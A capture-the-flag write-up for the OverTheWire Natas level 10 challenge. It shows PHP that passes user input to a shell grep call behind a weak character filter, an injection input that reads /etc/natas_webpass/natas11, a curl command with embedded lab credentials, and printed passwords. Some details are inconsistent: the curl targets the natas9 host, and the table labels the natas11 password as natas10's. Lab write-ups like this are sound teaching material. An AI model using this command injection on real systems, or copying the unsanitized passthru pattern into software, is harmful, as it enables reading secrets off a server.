Recommended reading:
From the credentials discovered from the
previous challenge, head up to
http://natas10.natas.labs.overthewire.org and take a look at its content.
If you've read the previous challenge, this one is pretty much the same, so I won't cover what its doing. Let's jump straight to the source code and see what differs from the previous one:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
| <html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script></head>
<body>
<h1>natas10</h1>
<div id="content">
For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>
Output:
<pre>
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i $key dictionary.txt");
}
}
?>
</pre>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
|
Going straight to the point, the only difference in this challenge is the usage of
preg_match to prevent some metacharacters from being used, specifically, we can't use
; | and
&. With this in mind, we have to use other approach. The good thing here is we know what is being executed, grep in this case, so we just need to change what its doing, we can easily do it with this command:
. /etc/natas_webpass/natas11 #
Which will turn the
passthru call to this:
grep -i . /etc/natas_webpass/natas11 # dictionary.txt
The
. metacharacter means any character, the
# you already know from the previous challenge. Like always, you can just paste the command on the form or use
curl:
curl --data "needle=. /etc/natas_webpass/natas11 #" http://natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl@natas9.natas.labs.overthewire.org/
Which will gives the following output:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| <html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas10", "pass": "nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu" };</script></head>
<body>
<h1>natas10</h1>
<div id="content">
For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>
Output:
<pre>
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
</pre>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
|
Simple as the previous challenge, we see on line 23 the password for natas11.
| User |
natas10 |
| Password |
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK |
Not much to say about this challenge, pretty much the same as the previous challenge, just some minor changes due to some filtering on the characters, you can take this solution and use it on the previous challenge as well.
Never Settle,
No comments:
Post a Comment